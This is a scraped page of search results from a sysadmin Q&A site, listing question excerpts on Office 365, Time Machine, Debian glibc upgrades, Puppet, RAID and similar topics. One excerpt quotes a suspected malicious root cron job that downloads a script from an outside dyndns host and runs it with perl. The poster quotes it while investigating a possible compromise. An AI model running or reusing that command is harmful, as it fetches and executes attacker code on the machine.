Search Results

Search found 10384 results on 416 pages for 'plan cache'.

Page 225/416 | < Previous Page | 221 222 223 224 225 226 227 228 229 230 231 232  | Next Page >

  • Office 365 E3 with Exchange Hosted Encryption (EHE)

    - by Stephen
    I hope this is the right forum for posting this question. I have a client who wants to move to Office 365. They are currently running on a trial of Office 365 E3 plan. My staff are now also using Office 365 E3 via the internal use licences provided as part of the MS Cloud Partner benefits. We've search high and low, spoken to about 15 different people at Office 365 Support, as well as my local distributor's MS Product Manager, but we cannot seem to find out exactly how to purchase/subscribe to the Exchange Hosted Encryption (EHE) service, or how to configure/use it from Office 365. Does anybody out there have any insight into how we can setup and use the EHE service? Thanks! Stephen

    Read the article

  • Is it reasonable to use my Time Machine backup to migrate to a new primary hard drive?

    - by Michael Haren
    I'm planning to upgrade my MacBook's harddrive. I already use Time Machine to back up the system to an external drive. Is it reasonable to use Time Machine to restore my system to the new laptop drive, once I install it? I mean, a restore like this really ought to be fine, right? That's the point of it, after all! I know imaging the drive would be more appropriate but this plan seems a whole lot easier (albeit probably slower), with practically no risk since my original drive won't be involved. A second question would then be, are there any considerations to be made when doing a Time Machine restore?

    Read the article

  • How can I remove HTTP headers with .htaccess in Apache?

    - by Daniel Magliola
    I have a website that is sending out "cache-control" and "pragma" HTTP headers for PHP requests. I'm not doing that in the code, so I'm assuming it's some kind of Apache configuration, as suggested by this question (you don't really need to go there for this question's context) I don't have anything in my .htaccess files, so it's gotta be in Apache's configuration itself, but I can't access that, this is a shared hosting, I only have FTP access to my website's directory. Is there any way that I can add directives to my .htaccess files that will remove the headers added by the global configuration, or otherwise override the directive so that they're not added in the first place? Thank you very much Daniel

    Read the article

  • reaching 99.9999% uptime

    - by user35204
    I am currently developing a project which is mission-critical. The actual domain name is registered with 1 & 1 and I plan on purchasing DynDNS Custom DNS service (which has 5 different geographical locations for DNS) and then another secondary DNS service to make sure my DNS is as failover safe as possible. Does it matter that the registration is with 1 & 1 - are they a weak link in the chain? All I really use them for is to say that DynDNS is my primary DNS nameserver and then my secondary DNS is my other nameserver. I can transfer the registration to DynDNS - Im just not sure if it really matters or not. Thanks

    Read the article

  • Suspect cron job Centos 6.5 + Virtualmin, Recommended course of action?

    - by sr_1436048
    I was doing some routine maintenance on my server and noticed a new cron job. It is set to run every 5 minutes as root: cd /tmp;wget http://eventuallydown.dyndns.biz/abc.txt;curl -O http://eventuallydown.dyndns.biz/abc.txt;perl abc.txt;rm -f abc* I've tried to download the file, but there is nothing to download. The server is running normally and there are no strange signs that the box has been compromised other than this entry. The only thing I can think of is I recently installed Varnish Cache following this tutorial. Given that I did not enter the cron job and that there appears to be nothing wrong, besides disabling that cron job what would be the appropriate course of action from this point?

    Read the article

  • Problem upgrading kernel on debian 3.1

    - by exhuma
    Hi, I have a quite old box in a remote server farm. So I have no direct access. Only remote SSH (and via SSH to a serial console). I haven't updated this box in ages. Now, whenever I want to install a new package, a dependency to glibc appears. Unfortunately, the install of glibc depends on a 2.6 kernel and I am running a venerable 2.4 kernel (one more reason to upgrade). The problem is, that the install of a new kernel has an indirect (over locales) dependency to glibc. So, to install glibc, I need a new kernel. For a new kernel, I need to upgrade glibc. Essentially I am blocked. What's the best way to proceed considering I have no "hardware" access? Here's a quick transcript of the upgrade process: [green:~]% sudo aptitude install linux-image-686 Reading Package Lists... Done Building Dependency Tree Reading extended state information Initializing package states... Done Reading task descriptions... Done The following packages are unused and will be REMOVED: gcc-4.3-base The following NEW packages will be automatically installed: dash libc6-i686 libparse-recdescent-perl linux-image-2.6-686 linux-image-2.6.18-6-686 module-init-tools yaird The following packages have been kept back: adduser apache2 apache2-mpm-prefork apache2-utils apache2.2-common apt apt-utils aptitude autoconf autotools-dev awstats base-files base-passwd [...snip...] util-linux vacation vim vim-common wamerican wbritish wget whiptail whois wwwconfig-common zlib1g The following NEW packages will be installed: dash libc6-i686 libparse-recdescent-perl linux-image-2.6-686 linux-image-2.6.18-6-686 linux-image-686 module-init-tools yaird The following packages will be upgraded: hotplug libc6 2 packages upgraded, 8 newly installed, 1 to remove and 277 not upgraded. Need to get 0B/22.7MB of archives. After unpacking 52.1MB will be used. Do you want to continue? [Y/n/?] Writing extended state information... Done Preconfiguring packages ... (Reading database ... 34065 files and directories currently installed.) Preparing to replace libc6 2.3.6.ds1-13 (using .../libc6_2.7-18lenny2_i386.deb) ... Checking for services that may need to be restarted... Checking init scripts... WARNING: init script for postgresql not found. [ --- libc6 config screen appears here --- ] WARNING: POSIX threads library NPTL requires kernel version 2.6.8 or later. If you use a kernel 2.4, please upgrade it before installing glibc. The installation of a 2.6 kernel _could_ ask you to install a new libc first, this is NOT a bug, and should *NOT* be reported. In that case, please add etch sources to your /etc/apt/sources.list and run: apt-get install -t etch linux-image-2.6 Then reboot into this new kernel, and proceed with your upgrade dpkg: error processing /var/cache/apt/archives/libc6_2.7-18lenny2_i386.deb (--unpack): subprocess pre-installation script returned error exit status 1 Errors were encountered while processing: /var/cache/apt/archives/libc6_2.7-18lenny2_i386.deb E: Sub-process /usr/bin/dpkg returned an error code (1) Ack! Something bad happened while installing packages. Trying to recover: dpkg: dependency problems prevent configuration of locales: locales depends on glibc-2.7-1; however: Package glibc-2.7-1 is not installed. dpkg: error processing locales (--configure): dependency problems - leaving unconfigured Errors were encountered while processing: locales Reading Package Lists... Done Building Dependency Tree Reading extended state information Initializing package states... Done Reading task descriptions... Done Now, if I follow the instrunctions as promted I get the following. Note that I am using aptitude instead of apt-get to benefit from the better dependency tracking. I did try with apt-get first. But that let me to the same problem. [green:~]% sudo aptitude install -t etch linux-image-2.6.26-2-686 Reading Package Lists... Done Building Dependency Tree Reading extended state information Initializing package states... Done Reading task descriptions... Done E: Unable to correct problems, you have held broken packages. E: Unable to correct dependencies, some packages cannot be installed E: Unable to resolve some dependencies! Some packages had unmet dependencies. This may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of Incoming. The following packages have unmet dependencies: linux-image-2.6.26-2-686: Depends: initramfs-tools (>= 0.55) but it is not installable or yaird (>= 0.0.13) but it is not installable or linux-initramfs-tool which is a virtual package. Any ideas?

    Read the article

  • How to consolidate servers with the not-very-strong infrastructure

    - by Sim
    All, Situation We are in retail industry with about 10 distributors and use Solomon as the standard ERP for all our systems Each distributor has 1 HQ and 5 - 10 branches, each branch has their own server (Windows 2000/XP/2003 + Solomon + another built-in POS system) Everyday, branches has to extract data and send (via email/Skype) to HQ for data consolidation purpose When we first deployed our ERP, the infrastructure (e.g. Internet connection) wasn't reliable enough. That's why we went with the de-centralized model (each branch got their own server) Now, the infrastructure is mature already. And we need to consolidate data more quickly (not from branches -- HQ -- our company but something like HQ -- our company only) Goal We just have Solomon servers in distributor HQ. All the transactions in branches (retrieved from POS) will by synchronized with HQ server directly) There is a backup plan just in case the Internet goes down, or HQ server goes down Question With the above question, could you guys suggests some model for me ? Should we use Terminal services, any other solutions ? Any watchout/suggestions ? Any good article to read 'bout this ? Thanks a lot

    Read the article

  • Can't seem to disable Java Automatic Update

    - by sbussinger
    I'm just tweaking out my new Windows 7 laptop and wanted to disable the automatic Java updating (and thus kill the silly jusched.exe background process), but I can't seem to get it to actually turn it off. I found the Java Control Panel applet and found the settings on the Update tab that should control it. I can turn them off, apply them, and close the dialog successfully. But if I just open the dialog backup again right away, I see that the changes weren't actually made. I've tried it numerous times and it just doesn't take. What's up with that? I also tried to disable the icon in the system tray and got the same effect. Changing the size of the Temporary Internet Files cache work however. Any ideas? Thanks!

    Read the article

  • Chrome: Black Screen of Death

    - by davidsinjaya
    I dont know when it started to happen. The screen will turn into full black when a page include javascript (I think so). I cannot open Youtube videos, but I can still see the source code and the pointer to find links and buttons and I can hear the sound of video. I have tried to clear my cache and reinstalled to the latest version, but nothing seems work. Moreover, I have disabled the Pepperflash Player as well, but it did not help. This my chrome version Google Chrome 22.0.1229.79 (Official Build 158531) OS Windows WebKit 537.4 (@129177) JavaScript V8 3.12.19.11 Flash 11.3.31.331 Please help.

    Read the article

  • Facebook doesn't work on computer, but work on mobile device, both use the same router

    - by sasa
    I have a very strange problem and I'm thinking that can be problem with dns or something similar, but not sure and don't know how to solve. My computer is connected to router and every site works fine except facebook (Chrome and Firefox). Chrome shows "Error 101 (net::ERR_CONNECTION_RESET): The connection was reset." But, on mobile device witch is connected to the same router facebook works fine (Fb application and Delphin browser). Pinging facebook works fine. Clearing cookies and cache didn't help. Also, I performed antivirus and antimalware scan and there is nothing. What can be a problem? Update: I'm also connect notebook on that wifi router, and on it works fine. nslookup facebook.com Server: UnKnown Address: 192.168.1.1 Non-authoritative answer: Name: facebook.com Addresses: 2a03:2880:2110:3f01:face:b00c:: 2a03:2880:10:1f02:face:b00c:0:25 2a03:2880:10:8f01:face:b00c:0:25 69.171.224.37 69.171.229.11 69.171.242.11 66.220.149.11 66.220.158.11

    Read the article

  • Multi-Application Server Environment and Memcached Security

    - by jocull
    We are looking to integrate Memcached into our infrastructure, but have a security concern before we do. We run several platforms including ASP.NET and Coldfusion and have many app developers working many little applications across the different platforms. The concern is this: App A places item "dog" into cache. App B reads item "dog" (or worse: App B updates item "dog") After this happens, App A either retrieves bad information, or has already had its information viewed, aka "stolen". What we would like to do is make it so that each app can only interact with its own sandbox, and may not interfere with or read other application's data. Is this possible? Thanks.

    Read the article

  • Zero-channel RAID for High Performance MySQL Server (IBM ServeRAID 8k) : Any Experience/Recommendation?

    - by prs563
    We are getting this IBM rack mount server and it has this IBM ServeRAID8k storage controller with Zero-Channel RAID and 256MB battery backed cache. It can support RAID 10 which we need for our high performance MySQL server which will have 4 x 15000K RPM 300GB SAS HDD. This is mission-critical and we want as much bandwidth and performance. Is this a good card or should we replace with another IBM RAID card? IBM ServeRAID 8k SAS Controller option provides 256 MB of battery backed 533 MHz DDR2 standard power memory in a fixed mounting arrangement. The device attaches directly to IBM planar which can provide full RAID capability. Manufacturer IBM Manufacturer Part # 25R8064 Cost Central Item # 10025907 Product Description IBM ServeRAID 8k SAS - Storage controller (zero-channel RAID) - RAID 0, 1, 5, 6, 10, 1E Device Type Storage controller (zero-channel RAID) - plug-in module Buffer Size 256 MB Supported Devices Disk array (RAID) Max Storage Devices Qty 8 RAID Level RAID 0, RAID 1, RAID 5, RAID 6, RAID 10, RAID 1E Manufacturer Warranty 1 year warranty

    Read the article

  • How to Launch Spotlight from the Terminal

    - by Jack7890
    I used this tip top hide my menu bar in a bunch of applications, which is a great way to get more free screen space. The one downside is that (for inexplicable reasons) it disables Spotlight when I'm in those applications--e.g. even if I hover over the menu bar to make it appear, clicking on the Spotlight icon does nothing. I have a plan to work around this: I'd like to launch Spotlight using QuicKeys, which lets you run terminal commands using keyboard shortcuts. But to do that, I need to know how to launch Spotlight with a terminal command. Does anyone know how to do this? I'm on OS X 10.6.

    Read the article

  • dependency hell

    - by Delirium tremens
    I'm trying to install empathy. Current version has to be installed from source, but needs a list of things that have to be installed one by one. Previous version is in repository, but blinks (opens, then right after that, closes). Previous version of the previous version: apt-cache search -showpkg empathy shows general empathy information and a telepathy too, but not the rpm file name taking the rpm file name from a Google search result, apt-get install package=empathy-2.30.1-2pclos2010 says package package (twice, really) not found installing apturl, clicking the rpm file link, opening it with apturl, installation gui starts, but fails opening the rpm file with Synaptic doesn't work opening the rpm file with /usr/bin/apt-get doesn't work What now?

    Read the article

  • Puppet master/agent basic setup

    - by lewap
    I'm trying to setup a basic puppet agent/master use-case with an agent server and a master. I've setup two servers with puppet and puppet master respectively. After the following setup of both servers: puppet master --no-daemonize --verbose puppet agent --test puppet cert --list to get the list, puppet cert --sign to sign it. puppet agent --test I get the message: err: Could not retrieve catalog from remote server: hostname was not match with the server certificate warning: Not using cache on failed catalog err: Could not retrieve catalog; skipping run err: Could not send report: hostname was not match with the server certificate What do I need to do in order to get the agent/master to be able to talk to each other?

    Read the article

  • supervisord failed to start nagiosapi after reboot, need to run reload manually

    - by Bajingan Keparat
    I have supervisord to start nagiosapi everytime the server starts. The API created a status dump file called status.dat, which will get updated periodically. The following is the conf file that starts the api. [program:nagapi] directory = /home/nagapi user = api command = /bin/bash -c "source /home/nagapi/.virtualenvs/nagapi/bin/activate; /home/nagapi/nagios-api/nagios-api" stdout_logfile = /home/nagapi/supervisor_nagios-api_stdout.log stderr_logfile = /home/nagapi/supervisor_nagios-api_stderr.log Everytime i restart the server, supervisord cannot start the api. stderr.log claims that it cannot find the status.dat file located in /var/cache/nagios3. It seems like the files was not created yet when supervisor tried to run the api the first time. I'm saying this because if i do a supervisorctl reload, everything would reload just fine, and the api would run ok about 50 seconds after the reload command completes. should i change the command option of the conf file to check for

    Read the article

  • Are periodic full backups really necessary on an incremental backup setup?

    - by user2229980
    I intend to use an old computer I have as a remote backup server for myself and a few other people. We are all geographically separated, and the plan is to do incremental daily backups using rsync and ssh. My original idea was to make one initial full backup then never again have to deal with the overhead of doing it, and from that moment on only copy the files changed since the last backup. I've been told that this could be bad, but I fail to understand why. Since each snapshot is comprised of hard links to the unchanged files plus the original changed ones, isn't it going to be identical to a new full backup? Why would I want to make another full backup?

    Read the article

  • error while adding web service to server in website panel

    - by sam
    I got following error while creating website for user in website panel.I am not able to create any hosting space in server's hosting plan it is showing 0 mb space. Stack Trace: [SoapException: System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.UriFormatException: Invalid URI: The Authority/Host could not be parsed. at System.Uri.CreateThis(String uri, Boolean dontEscape, UriKind uriKind) at System.Uri..ctor(String uriString) at Microsoft.Web.Services3.WebServicesClientProtocol.set_Url(String value) at WebsitePanel.Server.Client.ServerProxyConfigurator.Configure(WebServicesClientProtocol proxy) at WebsitePanel.EnterpriseServer.ServiceProviderProxy.ServerInit(WebServicesClientProtocol proxy, ServerProxyConfigurator cnfg, String serverUrl, String serverPassword) at WebsitePanel.EnterpriseServer.ServiceProviderProxy.ServerInit(WebServicesClientProtocol proxy, ServerProxyConfigurator cnfg, Int32 serverId) at WebsitePanel.EnterpriseServer.ServiceProviderProxy.Init(WebServicesClientProtocol proxy, Int32 serviceId) at WebsitePanel.EnterpriseServer.WebAppGalleryController.InitFeedsByServiceId(Int32 UserId, Int32 serviceId) at WebsitePanel.EnterpriseServer.esWebApplicationGallery.GetGalleryApplicationsByServiceId(Int32 serviceId) --- End of inner exception stack trace ---] System.Web.Services.Protocols.SoapHttpClientProtocol.ReadResponse(SoapClientMessage message, WebResponse response, Stream responseStream, Boolean asyncCall) +1485877 System.Web.Services.Protocols.SoapHttpClientProtocol.Invoke(String methodName, Object[] parameters) +221 WebsitePanel.EnterpriseServer.esWebApplicationGallery.GetGalleryApplicationsByServiceId(Int32 serviceId) +68 WebsitePanel.Portal.WebAppGalleryHelpers.GetGalleryApplicationsByServiceId(Int32 serviceId) +31 can anybody help me in this.

    Read the article

  • Puppet apache module causing 'Error 400 on SERVER: Invalid parameter identifier'

    - by Andy Shinn
    I am receiving the following error when trying to use the latest puppetlabs-apache module from github (https://github.com/puppetlabs/puppetlabs-apache): Error: Could not retrieve catalog from remote server: Error 400 on SERVER: Invalid parameter identifier at /etc/puppet/environments/apache_update/modules/apache/manifests/mod.pp:40 on node zordon.mydomain.com Warning: Not using cache on failed catalog Error: Could not retrieve catalog; skipping run My node config looks like: node 'zordon.mydomain.com' { include template::common include template::puppetagent include template::lamp User::Create sudo::conf { 'joe': priority = 60, content = 'joe ALL=(ALL) NOPASSWD: ALL', require = User::Create['joe'], } } The template::lamp class is what uses apache module: class template::lamp { include myfirewall Firewall Firewall class { 'apache': } class { 'apache::mod::php': } class { 'apache::mod::ssl': } class { 'mysql::server': } } It looks like serverfault markup is getting garbled on Puppet realize statements. The User::Create and Firewall lines are just realizing a user and 2 firewall rules. I have verified that the /var/lib/puppet/lib/puppet/type/a2mod.rb type has the identifier parameter and it is the same MD5 as the server. I am using Puppet 3.0.1 on both agent and master. Any idea what may cause this?

    Read the article

  • Understanding top output in Linux

    - by Rayne
    Hi, I'm trying to determine the CPU usage of a program by looking at the output from Top in Linux. I understand that %us means userspace and %sy means system/kernel etc. But say I see 100%us. Does this mean that the CPU is really only doing useful work? What if a CPU is tied up waiting for resources that are not avaliable, or cache misses, would it also show up in the %us column, or any other column? Thank you.

    Read the article

  • Getting error 2048 at whatever I'm doing in Eclipse

    - by Bernhard V
    Hi, whatever I'm doing in Eclipse, I get an error. At start up I get an error at Java tooling initializing. I get an error when I want to open a type. And it's always the same error. For example, when opening a type I get: An internal error occurred during: "Cache refresh". 2048 The error at the start up also prints the error code as 2048. I'm using the most up to date version of Eclipse. Do you know a way to fix this issue?

    Read the article

  • My HP-Vista based laptop has become very slow recently

    - by goldenmean
    My HP laptop which has Vista Home premium. When I try to start Firefox, internet explorer, it becomes very slow. No other app. When i checked the Performance in Task Manager. It shows the Physical memory , Free as 0 bytes, almost always. This has been recently. Earlier it didn't used to be zero. Laptop has 2GB of RAM. I have nothing running in my tray except - Sound control, Laptop power plan indicator,Network status indicator. There are no other processes whose memory usage adds up to so high to make Free memory as 0. Then what could be hogging the memory and make the laptop very slow. Any pointers would help as it is crawling at the moment.

    Read the article

  • AWS RDS Timeout

    - by warder57
    I know next to nothing about networking/servers. So I'm assuming I'm missing something obvious. All of the resources I can find on this, either don't work or are outdated. I created a brand new AWS account on the free plan. I created a postgres RDS DB instance. I made sure that this RDS instance is set to publicly accessible. This RDS instance has the default VPC/Security Group settings. In order to connect to this DB from my local machine, I used pgadmin3 and followed the instructions provided on the AWS documentation page. Seen here: http://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ConnectToPostgreSQLInstance.html I've double checked all of the information required to connect: Host: whatever.whatever.us-west-2.rds.amazonaws.com Port: 5432 Username: USERNAME Password: PASSWORD When I try to connect to the database, my connection fails due to a timeout. (During step 4 in the above guide.) Can anyone point me to whatever I am missing? Thanks in advance

    Read the article

  • faster ( squid + apache httpd + apache tomcat )

    - by letronje
    We have a production setup where we have Squid in the front(caching images, js, css, etc) Apache httpd in the middle(prefork + mod_rewrite + mod_jk/AJP + mod_deflate + mod_php(few php pages)) Apache tomcat 5.5 at the end serving all the dynamic stuff. What would be the best way to reduce the overhead of having 3 servers in the request path ? Wondering if replacing httpd with a faster web server like nginx/lighttpd will help. httpd right now does the job of url rewriting(for clean urls) and talking to tomcat(via mod_jk) and compressing output(mod_deflate) and serving some low traffic php pages. What would be ideal replacement for httpd given that we need these features? Is there a way to replace (squid + apache) with a single entity that does caching well (like squid) for static stuff, rewrites url, compresses response and forwards dynamic stuff directly to tomcat ? heard abt varnish cache, wondering if it can help.

    Read the article

  • Cisco, How to do a subnetting scheme using VLSM and RIP-2?

    - by Andrei T. Ursan
    I'm studying for my CCNA exam and I have to create a VLSM scheme using RIP-2 for the following requirements: (this is an exercise) Use the class C network 192.168.1.0 network for your point-to-point connections Using the Class A network 10.0.0.0, plan for the following number of hosts in each location: New York: 1000 Chicago: 500 Los Angeles: 1000 On the LAN and point-to-point connections, select subnet masks that use the smallest ranges of IP addresses possible given the above requirements. In all cases, use the lowest possible subnet numbers. Subnet zero is allowed. My guess is the following: New York: S0/0 192.168.1.1 /24 Fa0/0 10.1.0.1 netmask 255.255.248.0 - because we need 1000 hosts Chicago: S0/0 192.168.1.2 /24 Fa0/0 10.2.0.1 netmask 255.255.252.0 (for 500 hosts) Los Angeles: S0/0 192.168.2.3 /24 Fa0/0 10.3.0.1 netmask 255.255.248.0 (for 1000 hosts) Is this a good configuration? I'm reading the CCNA book but not everything is very clear, so I said to do some exercises... Thank you!

    Read the article

< Previous Page | 221 222 223 224 225 226 227 228 229 230 231 232  | Next Page >